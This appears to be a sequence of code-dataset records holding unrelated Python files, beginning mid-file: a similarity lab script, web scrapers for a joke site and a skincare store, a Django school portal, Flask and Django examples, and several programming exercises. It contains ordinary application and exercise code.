most_similar_syn2:\n my_babel = babel2[index]\n if nasari_babel == my_babel:\n correct+=1\n index+=1\n print(\"Accuracy over second babel: \",correct/len(most_similar_syn2))\n #calculate accuracy over couple\n correct = 0\n index = 0\n for nasari_babel in most_similar_syn2:\n my_babel = babel2[index]\n my_babel1 = babel1[index]\n nasari_babel1 = most_similar_syn1[index]\n if nasari_babel == my_babel and nasari_babel1 == my_babel1:\n correct+=1\n index+=1\n print(\"Accuracy over couples: \",correct/len(most_similar_syn2))\n\ndef consegna2():\n annotated_df = readSynsetManuallyAnnotated()\n print(annotated_df)\n calculateBestSimilarityNasariSynset(annotated_df)\n\n\ndef main():\n consegna1_df = consegna1()\n print(\"################################################\\n##########################################\\n#########################\")\n consegna2()\n\nif __name__ == \"__main__\":\n main()","sub_path":"semval_lab.py","file_name":"semval_lab.py","file_ext":"py","file_size_in_byte":11777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349881933","text":"import re\r\nimport urllib.request\r\nimport urllib.error\r\n\r\nif __name__ == \"__main__\":\r\n page = 2\r\n url = \"http://www.qiushibaike.com/hot/page/\" + str(page)\r\n user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'\r\n headers = {'User-Agent': user_agent}\r\n try:\r\n request = urllib.request.Request(url, headers=headers)\r\n response = urllib.request.urlopen(request)\r\n content = response.read().decode('utf-8')\r\n # re.S makes '.' also match newlines during matching\r\n # (the HTML tag literals originally surrounding the capture groups in this pattern appear to have been lost)\r\n pattern = re.compile('(.*?).*?(.*?).*?', re.S)\r\n items = re.findall(pattern, content)\r\n for item in items:\r\n print(\"test\")\r\n print(item[0], item[1])\r\n except urllib.error.URLError as e:\r\n if hasattr(e, 'code'):\r\n print(e.code)","sub_path":"crawler_test/test_two.py","file_name":"test_two.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"321227563","text":"from django.shortcuts import render\n\nfrom reader.overallPosition import overallPosition\n\nfrom dashboard.models import (Student, Payment, Record, Level, ScoreRemark,\n GeneralSetting, Subject, Bill\n )\n\nimport json\nimport re\n\n# mysql connection used in dashboard.views\n# from dashboard.views import mydb, c\n\n\ndef login(request):\n if request.method=='GET':\n students = Student.objects.all()\n context = {\n 'students': students,\n }\n return render(request, 'student_login.html', context)\n\n elif request.method =='POST':\n student_id = request.POST['student_id']\n student_name = request.POST['student_name']\n try:\n student = Student.objects.get(student_id=student_id, name=student_name)\n\n except:\n students = Student.objects.all()\n context = {\n 'students': students,\n 'error_message': 'Student Id and Student Name did not match'\n }\n return render(request, 'student_login.html', context)\n\n if student:\n return get_profile(request, student)\n\ndef get_profile(request, student):\n student_name = student.name\n student_class_id = student.level.id\n student_name_id = student.id\n\n students = Student.objects.filter(has_left=False, level_id=student_class_id)\n scores_and_names =[]\n for student in students:\n records = Record.objects.filter(\n student_name_id=student.id, class_of_record_id=student_class_id)\n\n totals = 0\n for record in records:\n if record.total:\n totals += record.total\n else:\n pass\n scores_and_names.append((str(student), totals))\n
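    # (illustrative sketch, not the imported helper) overallPosition from reader.overallPosition\n    # is assumed to rank the (name, total) pairs and return a mapping from student name to\n    # class position, roughly:\n    #   def overallPosition(pairs):\n    #       ranked = sorted(pairs, key=lambda p: p[1], reverse=True)\n    #       return {name: pos + 1 for pos, (name, _) in enumerate(ranked)}\n    #   overallPosition([('Ann', 250), ('Ben', 300)])  # -> {'Ben': 1, 'Ann': 2}\n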
student_position = overallPosition(scores_and_names)[student_name]\n\n student = Student.objects.get(level_id=student_class_id, name=student_name)\n records = Record.objects.all()\n # order by the scores in descending order\n score_remarks = ScoreRemark.objects.all().order_by('-score')\n # initializing empty array for scores/marks\n marks = []\n for score in score_remarks:\n marks.append(score.score)\n\n # for each of the records, find the total, remark and grades\n for record in records:\n # initializing i (used for iterating over the scores and their remarks)\n i = 0\n total = record.class_score + record.exam_score\n # calculating the total for each term and subject\n if not record.total:\n # SQL update\n # sql = \"UPDATE dashboard_record SET total = %s WHERE class_score = %s AND exam_score = %s\"\n # val = (total, record.class_score, record.exam_score)\n # c.execute(sql, val)\n # mydb.commit()\n\n\n # Django update\n Record.objects.filter(class_score=record.class_score, exam_score=record.exam_score, student_name=record.student_name).update(total = total)\n # record_to_update.total = total\n # record_to_update.save()\n\n\n remarkNotSet = True\n while remarkNotSet:\n # if the total for a particular subject is greater than the first score in marks array,\n # get that mark and its remarks (excellent, very good etc)\n if total >= marks[i]:\n remarks = ScoreRemark.objects.filter(score=marks[i])\n for r in remarks:\n grade = r.grade\n remark = r.remark\n # if the remark(excellent etc) or the grade (A, B. C etc) is not set, set it by updating the database\n if not record.remark or not record.grade:\n\n # SQL UPDATE\n # sql = \"UPDATE dashboard_record SET grade = %s, remark = %s WHERE total = %s\"\n # val = (grade, remark, record.total)\n # c.execute(sql, val)\n # mydb.commit()\n\n # Django UPDATE\n Record.objects.filter(total=record.total).update(grade = grade, remark = remark)\n # record_to_update.grade = grade\n # record_to_update.remark = remark\n # record_to_update.save()\n\n # stop the looping over the marks since the grade is found, if not it will iterate over smaller grade\n # and return wrong grade and remark\n remarkNotSet = False\n\n # else if the total mark is less than the first mark in the sorted mark array\n # go to the next mark by increasing the index(i)\n elif i < len(marks)-1:\n i = i + 1\n # if done with all the element in the mark array,\n # set the remark and grade for that total to be the least, (F, Fail)\n else:\n i = len(marks)-1\n remarks = ScoreRemark.objects.filter(score=marks[i])\n # getting the remark and grade for the least\n for r in remarks:\n grade = r.grade\n remark = r.remark\n if not record.remark or not record.grade:\n # SQL UPDATE\n # sql = \"UPDATE dashboard_record SET grade = %s, remark = %s WHERE total = %s\"\n # val = (grade, remark, record.total)\n # c.execute(sql, val)\n # mydb.commit()\n\n # DJANGO UPDATE\n Record.objects.filter(total=record.total, student_name_id=record.student_name_id).update(\n grade = grade, remark = remark\n )\n # record_to_update.grade = grade\n # record_to_update.remark = remark\n # record_to_update.save()\n\n remarkNotSet = False\n\n # get new record after the updates to be sent to the template for rendering\n records = Record.objects.filter(\n student_name_id=student_name_id, class_of_record_id=student_class_id, term=1)\n\n # student_class = Record.objects.filter(student_name=student_name)\n\n # get the classes for selection to view report\n all_classes = Level.objects.all()\n
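\n    # worked illustration of the threshold walk above (hypothetical values): with marks\n    # sorted descending, e.g. [80, 70, 60, 50, 40], a total of 73 stops at the first\n    # threshold it meets or exceeds (70) and that row's grade/remark is used; totals\n    # below every threshold fall through to the last (lowest) entry\n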
\n # initializing dictionary and arrays for drawing the chart\n\n # subject and their various terminal totals\n subjectAndTotals = {}\n # list of subjects\n subjects = []\n # classes of record available in the records table\n classes = []\n\n # chart data for a student\n chartData = Record.objects.filter(student_name_id=student_name_id).order_by('id')\n\n # for that data, get the records for the classes, subjects and their total scores\n for data in chartData:\n # classes.append(data.class_of_record)\n subjects.append(data.subject.name) if data.subject.name not in subjects else None\n\n for subject in subjects:\n values = 0\n subject_id = Subject.objects.get(name=subject).id\n\n # Sql update\n # query = \"SELECT total FROM dashboard_record WHERE subject_id = %s AND student_name_id = %s ORDER BY id\"\n # val = (subject_id, student_name_id)\n # c.execute(query, val)\n # totals = c.fetchall()\n\n # Django update\n totals = Record.objects.filter(subject_id=subject_id, student_name_id=student_name_id).order_by('id')\n totalsFortheSubject = []\n\n for total in totals:\n classes.append(\"Record \"+(values+1).__str__()) if \"Record \" + \\\n (values+1).__str__() not in classes else None\n values += 1\n # with the raw-SQL fetchall this used to look like [(93,), (78,), (69,), (47,), (8,)]; the ORM now yields Record objects\n totalsFortheSubject.append(total.total)\n\n # converting to strings to use regular expression and get values without brackets and commas\n # e.g. '[93, 78, 69, 47, 8]' (leftover from the old tuple format, but still works)\n totalsFortheSubject = totalsFortheSubject.__str__()\n\n # finding the values using regular expression\n totalsFortheSubject = re.findall('[0-9]+', totalsFortheSubject)\n\n # new array for storing the int totals\n intTotalsFortheSubject = []\n for stringTotal in totalsFortheSubject:\n # getting the totals in integer format\n intTotalsFortheSubject.append(int(stringTotal))\n\n subjectAndTotals.update({subject: intTotalsFortheSubject})\n payments = Payment.objects.filter(student_name_id=student_name_id,\n approved=True, deleted=False).order_by('-id')\n\n totalPayment = Payment.objects.filter(student_name_id=student.id,\n approved=True, deleted=False)\n payment_amount = 0\n bill_amount = 0\n for payment in totalPayment:\n payment_amount += payment.amount\n\n totalBill = Bill.objects.filter(student_id=student.id)\n for bill in totalBill:\n for item in bill.billitem_set.all():\n bill_amount += item.amount\n\n\n context = {\n 'settings': GeneralSetting.objects.all()[0],\n 'student_position': student_position,\n 'payments': payments,\n 'amount_owing': bill_amount-payment_amount,\n 'all_classes': all_classes,\n 'student': student,\n 'subjects': json.dumps(subjects),\n 'subjectAndTotals': json.dumps(subjectAndTotals),\n 'classes': json.dumps(classes),\n }\n return render(request, 'student_profile.html', context)\n","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96968655","text":"# Minjoo Kim\n# ITP 115, Fall 2019\n# Assignment #3\n# 9/22/2019\n# minjook@usc.edu\n\n# Description:\n# This program calculates the largest, smallest, and average of the given numbers.\n\n\ndef main():\n repeat = \"y\"\n\n while repeat == \"y\":\n number = 0\n large = -9999\n small = 9999\n total = 0\n count = 0\n\n print(\"Input an integer greater than or equal to 0 or -1 to quit:\")\n while number != -1:\n number = int(input())\n\n if number != -1:\n if number > large:\n large = number\n\n if number < small:\n small = number\n\n total += number\n count += 1\n\n average = total / count\n\n print(\"The largest 
number is \" + str(large))\n print(\"The smallest number is \" + str(small))\n print(\"The average number is \" + str(average))\n print(\"\\n\")\n repeat = input(\"Would you like to enter another set of numbers? (y/n): \")\n\n print(\"Goodbye!\")\n\n\nmain()\n","sub_path":"ITP 115 Assignments/ITP115_a3_Kim_Minjoo/ITP 115 Asn #3 - Largest, Smallest, and Average Number.py","file_name":"ITP 115 Asn #3 - Largest, Smallest, and Average Number.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"335660387","text":"# coding=utf-8\n\n'''\nAuthor: Amos.Li\nEmail: hpu120623@gmail.com\n\ndate: 2019/10/30 18:39\n'''\n\nfrom flask import Flask, jsonify\n\n# 创建flask的应用对象\n# __name__表示当前的模块名字\n# 模块名,flask以这个模块所在的目录为总目录,默认这个目录中的static为静态目录,templates为模板目录\napp = Flask(__name__,\n static_url_path='/python', # 访问静态资源的url前缀,默认值是static\n static_folder='static', # 静态文件的目录,默认就是static\n template_folder='templates', # 模板文件的目录,默认是templates\n )\n\n# 配置参数的使用方式\n# 1.使用配置文件\n# app.config.from_pyfile('config.cfg')\n\n# 2.使用对象配置参数(项目中使用)\nclass Config:\n DEBUG = True # 开启debug模式后,有修改会自动重启\n\n# app.config.from_object(Config)\n\n# 3.直接操作config的字典对象\n# app.config['DEBUG'] = True\n\n\n\n@app.route('/')\ndef index():\n \"\"\"定义视图函数\"\"\"\n # return jsonify({'result': 'hello flask'})\n a = 1 / 0\n return 'hello flask'\n\n\nif __name__ == '__main__':\n # 启动flask程序\n # app.run()\n app.run(host='192.168.1.197', port=8899)\n # app.run(host='0.0.0.0', port=8899)\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"51885371","text":"import sys\n\nread = sys.stdin.readline\n\ndef find(x) :\n if par[x] == x : return par[x]\n else :\n par[x] = find(par[x])\n return par[x]\n \ndef merge(x,y) :\n p_x = find(x)\n p_y = find(y)\n\n if p_x == p_y : return\n par[p_x] = p_y\n\nT = int(read())\nfor _ in range(T) :\n N,M = map(int,read().split())\n par = [i for i in range(N+1)]\n cnt = 0\n for _ in range(M) :\n a,b = map(int,read().split())\n if find(a) == find(b) : continue\n merge(a,b)\n cnt += 1\n print(cnt)\n","sub_path":"BOJ/30_최소신장트리/9372_상근이의여행.py","file_name":"9372_상근이의여행.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"504342243","text":"\nclass Utilities:\n \"\"\"This Class Serves as an helper class to Perform Grouping Checks\"\"\"\n\n @staticmethod\n def check_subscriptability(pod):\n \"\"\"Checks if an Application Grouping is Subscriptable\n\n :param str pod: Defines Pod objedct returned from getting deployment Pods.\n :return: str application group\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n try:\n application_group = pod.metadata.labels['applicationGroup']\n except TypeError:\n application_group = None\n return application_group\n","sub_path":"utils/basic_utilities.py","file_name":"basic_utilities.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"40384566","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 6 12:16:58 2019\n\n@author: mackenziemitchell\n\"\"\"\n\nimport requests\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom bs4 import BeautifulSoup\nimport pickle\nfrom 
RecFunctions import get_products_by_type,get_products_by_problem, categorical_columns, type_column\n\n#Functions Scrape Data and Get Info Df's For SkinStore\n\ncleansers=get_products_by_type('cleansers',14)\nexfoliators=get_products_by_type('exfoliators',6)\nremovers=get_products_by_type('makeup-removers',3)\ntoners=get_products_by_type('toners',6)\nmists=get_products_by_type('mists',3)\ntreatments=get_products_by_type('treatments',14)\nserums=get_products_by_type('serums',16)\nlotions=get_products_by_type('lotions',6)\nmoisturizers=get_products_by_type('moisturizers',23)\nbalms=get_products_by_type('balms',3)\noils=get_products_by_type('oils',5)\nmasks=get_products_by_type('masks',9)\npeels=get_products_by_type('peels',3)\nlips=get_products_by_type('lip-care',4)\neyes=get_products_by_type('eye-care',9)\nsupplements=get_products_by_type('supplements',1)\ntools=get_products_by_type('tools',5)\n\nacnedf,acne = get_products_by_problem('acne-blemishes',10)\nagedf,age = get_products_by_problem('anti-aging',30)\ndarkcdf,darkcircles = get_products_by_problem('dark-circles',5)\ndrydf,dryness = get_products_by_problem('dry-skin',19)\nncdf,norm= get_products_by_problem('normal-combination',17)\noilydf,oily=get_products_by_problem('oily-skin',17)\nsensitivedf,sensi=get_products_by_problem('sensitive-skin',17)\nreddf,redness=get_products_by_problem('redness-rosacea',17)\n\nbraa=[]\nratee=[]\npri=[]\nur=[]\nimgs=[]\n#collect product name, rating, price and url from every problem dataframe\nfor problem_df in [acnedf, agedf, darkcdf, drydf, ncdf, oilydf, sensitivedf, reddf]:\n for i,r,p,u in zip(problem_df.prodName,problem_df.rating,problem_df.price,problem_df.url):\n braa.append(i)\n ratee.append(r)\n pri.append(p)\n ur.append(u)\ndatadict=[]\nfor i,r,p,u in zip(braa,ratee,pri,ur):\n datadict.append({'prodName':i,'rating':r,'price':p,'url':u})\nfinaldf=pd.DataFrame(datadict)\n\nfinaldf.rating=[float(i) for i in finaldf.rating]\nfinaldf.price=[float(i) for i in finaldf.price]\n\n
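#(illustrative sketch only -- the real helper lives in RecFunctions) categorical_columns is\n#assumed to add a 0/1 flag column marking whether each product's name appears in the scraped\n#list for that category, roughly:\n#   def categorical_columns(col, names_in_category, df):\n#       df[col] = [1 if name in names_in_category else 0 for name in df.prodName]\n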
#Finalize Full DF\ncategorical_columns('age',age,finaldf)\ncategorical_columns('darkcircles',darkcircles,finaldf)\ncategorical_columns('acne',acne,finaldf)\ncategorical_columns('dry',dryness,finaldf)\ncategorical_columns('redness',redness,finaldf)\ncategorical_columns('sensitive',sensi,finaldf)\ncategorical_columns('oily',oily,finaldf)\ncategorical_columns('normal',norm,finaldf)\ncategorical_columns('cleanser',cleansers,finaldf)\ncategorical_columns('exfoliator',exfoliators,finaldf)\ncategorical_columns('makeup-removers',removers,finaldf)\ncategorical_columns('toner',toners,finaldf)\ncategorical_columns('mist',mists,finaldf)\ncategorical_columns('treatment',treatments,finaldf)\ncategorical_columns('serum',serums,finaldf)\ncategorical_columns('lotion',lotions,finaldf)\ncategorical_columns('moisturizer',moisturizers,finaldf)\ncategorical_columns('balm',balms,finaldf)\ncategorical_columns('oil',oils,finaldf)\ncategorical_columns('mask',masks,finaldf)\ncategorical_columns('peel',peels,finaldf)\ncategorical_columns('lip',lips,finaldf)\ncategorical_columns('eye',eyes,finaldf)\ncategorical_columns('supplement',supplements,finaldf)\ncategorical_columns('tool',tools,finaldf)\n\n# with open('pickles/findf.pickle', 'wb') as f:\n# pickle.dump(finaldf, f, pickle.HIGHEST_PROTOCOL)\n\n#Get Review Info & Get Into DF\n\nratingdict=[]\nfor u in finaldf.url:\n response=requests.get('https://www.skinstore.com/the-ordinary-aha-30-bha-2-peeling-solution-30ml/{}.html'.format(u))\n soup=BeautifulSoup(response.content,'html.parser')\n titles=soup.findAll('h3',{'class':'productReviews_topReviewTitle'})\n ratings=soup.findAll('div',{'class':'productReviews_topReviewsRatingStarsContainer'})\n contents=soup.findAll('p',{'class':'productReviews_topReviewsExcerpt'})\n dates=soup.findAll('span',{'data-js-element':'createdDate'})\n users=soup.findAll('div',{'class':'productReviews_footerDateAndName'})\n brands=soup.find('div',{'data-information-component':'brand'})\n products=soup.find('h1',{'data-product-name':'title'})\n for t,r,c,d,i in zip(titles,ratings,contents,dates,users):\n ratingdict.append({'url':u,'brandName':brands.text.replace('\\n',''),'prodName':products.text,'title':t.text.replace('\\n',''),'rating':str(r).split('aria-label=')[1][1:2],'content':c.text.replace('\\n','').replace('\\r',''),'date':d.text,'user':i.text.replace('\\n','').split('by')[1].lower()})\nratingdf=pd.DataFrame(ratingdict)\nratingdf['rating']=[int(r) for r in ratingdf['rating']]\nratingdf.user=ratingdf.user.replace('','user')\nratingdf['brandName']=[r.replace('\\n','') for r in ratingdf['brandName']]\nratingdf.drop_duplicates(inplace=True)\nratingdf.content=[c.lower() for c in ratingdf.content]\nratingdf['date']=pd.to_datetime(ratingdf.date)\nfinaldf.drop(columns='rating',inplace=True)\nfinal=pd.merge(finaldf,ratingdf, on='url')\nfinal.drop(columns=['prodName_y'],inplace=True)\nfinal.rename(columns={'prodName_x':'prodName'},inplace=True)\n\n#Saving Final DF for Customized Rec Engine\n\nwith open('df1.pickle', 'wb') as f:\n pickle.dump(final, f, pickle.HIGHEST_PROTOCOL)\n","sub_path":"_GettingAllSkinStoreData.py","file_name":"_GettingAllSkinStoreData.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"471847037","text":"import acm\r\nfrom DealPackageDevKit import DealPackageDefinition, List, Action, Text, Settings\r\nfrom inspect import cleandoc\r\n\r\n@Settings(GraphApplicable=False,\r\n SheetApplicable=False)\r\nclass ListControlInteraction(DealPackageDefinition):\r\n 
\"\"\"\n Double click on one of the elements in the list, and it will move to \n the other list. You can also select one element and then click on the \n arrows in the middle to move an element.\n \"\"\"\n \n left = List( defaultValue=['Cat', 'Dog', 'Mouse'],\n label='Left',\n elementDomain='FString',\n onSelectionChanged='@UpdateSelectedElement',\n onDoubleClick='@MouseMoveTo',\n addNewItem =['First', 'Sorted'],\n sortIndexCallback='@AnimalSortingCallback',\n _moveToDestination='right')\n \n right = List( label='Right',\n elementDomain='FString',\n onSelectionChanged='@UpdateSelectedElement',\n onDoubleClick='@MouseMoveTo',\n addNewItem =['First', 'Sorted'],\n sortIndexCallback='@AnimalSortingCallback',\n _moveToDestination='left')\n \n moveToRight = Action( label='>',\n action='@ButtonMoveTo',\n _moveToDestination='right',\n enabled='@IsLeftElementSelected',\n sizeToFit=True)\n \n moveToLeft = Action( label='<',\n action='@ButtonMoveTo',\n _moveToDestination='left',\n enabled='@IsRightElementSelected',\n sizeToFit=True)\n \n doc = Text( defaultValue=cleandoc(__doc__),\n editable=False,\n height=80) \n\n # ####################### #\n # Interface Overrides #\n # ####################### #\n \n def OnInit(self):\n self._selected = {}\n \n def CustomPanes(self):\n return self.GetCustomPanesFromExtValue('CustomPanes_ListControlInteraction_DPE')\n \n def IsValid(self, exceptionAccumulator, aspect):\n exceptionAccumulator('This example is used to demonstrate lists and cannot be saved.')\n\n # ####################### #\n # Attribute Callbacks #\n # ####################### #\n \n def MouseMoveTo(self, attrName, selectedElement):\n self.UpdateSelectedElement(attrName, selectedElement)\n self.ButtonMoveTo(attrName)\n \n def ButtonMoveTo(self, attrName):\n destination = self.GetAttributeMetaData(attrName, '_moveToDestination')()\n self._MoveSelectedElementTo( destination )\n \n def UpdateSelectedElement(self, attrName, selectedElement):\n self._selected[attrName] = selectedElement\n \n def IsRightElementSelected(self, attrName):\n return self._GetSelectedElementInList('right') != None\n \n def IsLeftElementSelected(self, attrName):\n return self._GetSelectedElementInList('left') != None\n\n def AnimalSortingCallback(self, attrName, columnNbr, value1, formatter, obj):\n # Sort by reverse string\n return value1[::-1]\n \n # ####################### #\n # Convenience Methods #\n # ####################### # \n def _MoveSelectedElementTo(self, toList):\n fromList = self._GetOppositeListAttribute(toList)\n element = self._GetSelectedElementInList(fromList)\n if element != None:\n index = getattr(self, fromList).IndexOfFirstEqual(element)\n if index != -1:\n getattr(self, fromList).RemoveAt(index)\n getattr(self, toList).Add(element)\n self._selected['right'] = None\n self._selected['left'] = None\n \n def _GetOppositeListAttribute(self, attrName):\n return 'right' if attrName == 'left' else 'left'\n \n def _GetSelectedElementInList(self, listName):\n return self._selected.get(listName, None)\n","sub_path":"Extensions/Deal Package Examples/FPythonCode/ListControlInteraction_DPE.py","file_name":"ListControlInteraction_DPE.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"44329671","text":"from django.db import models\r\nfrom django.utils import encoding\r\n\r\nclass Product(models.Model):\r\n\tproductName = models.CharField(default='none', max_length=200)\r\n\ttcgId = models.IntegerField(default=-1, 
unique=True)\r\n\thiPrice = models.FloatField()\r\n\tlowPrice = models.FloatField()\r\n\tavgPrice = models.FloatField()\r\n\tlink = models.TextField(max_length=200)\r\n\t\r\n\tdef updateFieldsFromProduct(self, productInst):\r\n\t\tself.productName = productInst.productName\r\n\t\tself.tcgId = productInst.tcgId\r\n\t\tself.hiPrice = productInst.hiPrice\r\n\t\tself.lowPrice = productInst.lowPrice\r\n\t\tself.avgPrice = productInst.avgPrice\r\n\t\tself.link = productInst.link\r\n\t\treturn self\r\n\t\r\n\t@classmethod\r\n\tdef create(cls, jsonProductObject):\r\n\t\tproduct = cls()\r\n\t\tproduct.productName = jsonProductObject['name']\r\n\t\tproduct.tcgId = jsonProductObject.get('id', -1)\r\n\t\tproduct.hiPrice = jsonProductObject['hiprice']\r\n\t\tproduct.avgPrice = jsonProductObject['avgprice']\r\n\t\tproduct.lowPrice = jsonProductObject['lowprice']\r\n\t\tproduct.link = jsonProductObject['link']\r\n\t\treturn product\r\n\t\t\r\nclass CardSet(models.Model):\r\n\tsetCode = models.CharField(default='none', max_length=200, unique=True)\r\n\tgathererCode = models.CharField(default='none', max_length=200)\r\n\tname = models.CharField(default='none', max_length=200)\r\n\ttype = models.CharField(default='none', max_length=200)\r\n\tblock = models.CharField(default='none', max_length=200)\r\n\ttotal = models.IntegerField(default=0)\r\n\tcardIds = models.CharField(default='', max_length=500) #array of str \r\n\t\r\n\tdef updateFieldsFromSet(self, setInst):\r\n\t\tself.setCode = setInst.setCode\r\n\t\tself.gathererCode = setInst.gathererCode\r\n\t\tself.name = setInst.name\r\n\t\tself.type = setInst.type\r\n\t\tself.block = setInst.block\r\n\t\tself.cardIds = setInst.cardIds\r\n\t\treturn self\r\n\r\n\tdef getCardIds(self):\r\n\t\tcardIdArr = self.cardIds.replace(' ', '').split(',')\r\n\t\treturn cardIdArr\r\n\r\n\t@classmethod\r\n\tdef create(cls, jsonCardSetObject):\r\n\t\tcardSet = cls()\r\n\t\tcardSet.setCode = jsonCardSetObject['code']\r\n\t\tprint(cardSet.setCode)\r\n\t\tcardSet.gathererCode = jsonCardSetObject.get('gathererCode', 'none')\r\n\t\tcardSet.name = jsonCardSetObject['name']\r\n\t\tcardSet.type = jsonCardSetObject['type']\r\n\t\tcardSet.block = jsonCardSetObject.get('block', 'none')\r\n\t\tcards = []\r\n\t\tfor card in jsonCardSetObject['cards']:\r\n\t\t\t# try:\r\n\t\t\t\t# print(encoding.smart_text(card['name'], encoding='utf-8'))\r\n\t\t\t# except:\r\n\t\t\t\t# print('cannot encode card name')\r\n\t\t\tif(card.get('multiverseid', None) is not None):\r\n\t\t\t\tcards.append(card['multiverseid'])\r\n\t\tcardSet.cardIds = str(cards).strip('[]')\r\n\t\treturn cardSet\r\n\t\t\r\nclass Card(models.Model):\r\n\tmultiverseId = models.CharField(default='none', max_length=200, unique=True)\r\n\tname = models.CharField(default='none', max_length=200)\r\n\tcolors = models.CharField(default='', max_length=200) #array of str\r\n\trarity = models.CharField(default='none', max_length=200)\r\n\tformats = models.CharField(default='', max_length=200) #array of str\r\n\tproduct = models.OneToOneField(Product, blank=True, null=True)\r\n\t\r\n\tdef updateFieldsFromCard(self, cardInst):\r\n\t\tself.multiverseId = cardInst.multiverseId\r\n\t\tself.name = cardInst.name\r\n\t\tself.colors = cardInst.colors\r\n\t\tself.rarity = cardInst.rarity\r\n\t\tself.formats = cardInst.formats\r\n\t\tself.product = cardInst.product\r\n\t\treturn self
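\r\n\t# usage sketch (hypothetical id, not from the original repo): refresh a stored\r\n\t# row from a freshly fetched instance, then persist it:\r\n\t#   stored = Card.objects.get(multiverseId='12345')\r\n\t#   stored.updateFieldsFromCard(fetched_card)\r\n\t#   stored.save()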
\r\n\t\r\n\t@classmethod\r\n\tdef create(cls, jsonCardObject, product):\r\n\t\tcard = cls()\r\n\t\tcard.multiverseId = jsonCardObject.get('multiverseid', '-1')\r\n\t\tcard.name = jsonCardObject['name']\r\n\t\tcard.colors = str(jsonCardObject.get('colors', '')).strip('[]')\r\n\t\t#print(str(card.colors))\r\n\t\tcard.rarity = jsonCardObject['rarity']\r\n\t\tlegalities = jsonCardObject.get('legalities','')\r\n\t\tformats = []\r\n\t\tfor legalityKey in legalities:\r\n\t\t\tformats.append(str(legalityKey))\r\n\t\t#print('cardName: ' + card.name + ' , formats: ' + str(len(formats)))\r\n\t\tcard.formats = str(formats).strip('[]')\r\n\t\tif(product is not None):\r\n\t\t\tcard.product = product\r\n\t\treturn card\r\n\t\r\n\t","sub_path":"backend/dealfinder/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445341777","text":"#!/usr/local/bin/python3\n# ! -*- coding: utf-8 -*-\n\"\"\"\nMy own mysterious (w) search.\nDrop one digit at a time, starting from the largest.\nProbably O(10^n)?\n\"\"\"\n\nimport sys\nfrom decimal import Decimal\n\nY, M = (int(i) for i in sys.stdin.readline().split())\n\nYM = (Y-2013)*12+M\npre_i = 0\n\n\ndef cal_ym(q):\n q = Decimal(q)\n return (12*q+(q*(q+1))/Decimal(2))\n\n\ndef tansaku(start, end, step):\n pre_i = start\n for i in range(int(start), int(end), int(step)):\n if YM<=cal_ym(i):\n if step==1:\n return (i)\n else:\n return (tansaku(pre_i, end, step/10))\n else:\n pre_i = i\n\n\nj = tansaku(0, 10**17, 10**16)-1\nu_y = 2013+j\nu_m = YM-cal_ym(j)\nprint(u_y, int(u_m))\n","sub_path":"library_python/AtCoder_Event/utpc2013/utpc2013b_bekkai.py","file_name":"utpc2013b_bekkai.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"207729039","text":"import collections\na=dict(collections.Counter('halloklempnerdasistfantastischfluggegecheimen'))\nprint(\"Enter the stop word\",'\\n',sep='')\nc=str(input())\nf=[0]*len(c)\nb=str('halloklempnerdasistfantastischfluggegecheimen')\nt=float(1)\nq=0 \nfor i in range(len(c)):\n for j in range(len(b)):\n if (c[i]==b[j]):\n f[i]=f[i]+1 \nfor i in range(len(c)):\n if (f[i]==0):\n q=1 \nif (q==1):\n print('Sigizmund does not know the letter')\nelse:\n # probability = product over the stop word's letters of count(letter)/len(text)\n for i in range(len(c)):\n t=t*(a[c[i]]/len(b))\n print(\"The probability is =\",t)\n \n","sub_path":"Practice/18/Python/PY 18.py","file_name":"PY 18.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109501162","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Simple Python wrapper for runTagger.sh script for CMU's Tweet Tokeniser\nand Part of Speech tagger: http://www.ark.cs.cmu.edu/TweetNLP/\n\nPOS tags are represented with a single ASCII symbol. In brief:\n\n* __Nominal__\n `N` common noun\n `O` pronoun (personal/WH; not possessive)\n `^` proper noun\n `S` nominal + possessive\n `Z` proper noun + possessive\n* __Other open-class words__\n `V` verb incl. 
